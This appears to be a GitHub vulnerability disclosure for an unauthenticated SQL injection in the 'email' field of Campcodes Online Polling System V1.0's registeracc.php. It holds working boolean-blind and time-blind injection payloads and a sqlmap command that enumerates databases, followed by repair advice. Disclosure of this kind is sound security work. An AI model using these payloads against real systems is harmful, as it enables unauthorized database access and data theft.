Skip to content

# Campcodes Online Polling System V1.0 /Online_Polling_System/registeracc.php SQL injection #3

@ProgramShowMaker

Description

@ProgramShowMaker

NAME OF AFFECTED PRODUCT(S)

  • Online Polling System

Vendor Homepage

AFFECTED AND/OR FIXED VERSION(S)

submitter

lph200016

Vulnerable File

  • /Online_Polling_System/registeracc.php

VERSION(S)

  • V1.0

Software Link

PROBLEM TYPE

Vulnerability Type

  • SQL injection

Root Cause

  • A SQL injection vulnerability was found in the '/Online_Polling_System/registeracc.php' file of the 'Online Polling System' project. The reason for this issue is that attackers inject malicious code from the parameter 'email' and use it directly in SQL queries without the need for appropriate cleaning or validation. This allows attackers to forge input values, thereby manipulating SQL queries and performing unauthorized operations.

Impact

  • Attackers can exploit this SQL injection vulnerability to achieve unauthorized database access, sensitive data leakage, data tampering, comprehensive system control, and even service interruption, posing a serious threat to system security and business continuity.

DESCRIPTION

  • During the security review of "Online Polling System",I discovered a critical SQL injection vulnerability in the "/Online_Polling_System/registeracc.php" file. This vulnerability stems from insufficient user input validation of the 'email' parameter, allowing attackers to inject malicious SQL queries. Therefore, attackers can gain unauthorized access to databases, modify or delete data, and access sensitive information. Immediate remedial measures are needed to ensure system security and protect data integrity.

No login or authorization is required to exploit this vulnerability

Vulnerability details and POC

Vulnerability location:

  • 'email‘ parameter

Payload:

Parameter: email (POST)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: firstname=11&lastname=11&email=111@qq.com' RLIKE (SELECT (CASE WHEN (1218=1218) THEN 0x3131314071712e636f6d ELSE 0x28 END)) AND 'Mmds'='Mmds&password=admin&ConfirmPassword=admin&submit=Register Account

    Type: time-based blind
    Title: MySQL >= 5.0.12 RLIKE time-based blind
    Payload: firstname=11&lastname=11&email=111@qq.com' RLIKE SLEEP(5) AND 'CgEb'='CgEb&password=admin&ConfirmPassword=admin&submit=Register Account

The following are screenshots of some specific information obtained from testing and running with the sqlmap tool:

    sqlmap -u "http://172.20.10.2/Online_Polling_System/registeracc.php" -data="ffirstname=11&lastname=11&email=111%40qq.com&password=admin&ConfirmPassword=admin&submit=Register+Account" --dbs

Image

Suggested repair

  1. Use prepared statements and parameter binding:
    Preparing statements can prevent SQL injection as they separate SQL code from user input data. When using prepare statements, the value entered by the user is treated as pure data and will not be interpreted as SQL code.

  2. Input validation and filtering:
    Strictly validate and filter user input data to ensure it conforms to the expected format.

  3. Minimize database user permissions:
    Ensure that the account used to connect to the database has the minimum necessary permissions. Avoid using accounts with advanced permissions (such as' root 'or' admin ') for daily operations.

  4. Regular security audits:
    Regularly conduct code and system security audits to promptly identify and fix potential security vulnerabilities.

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions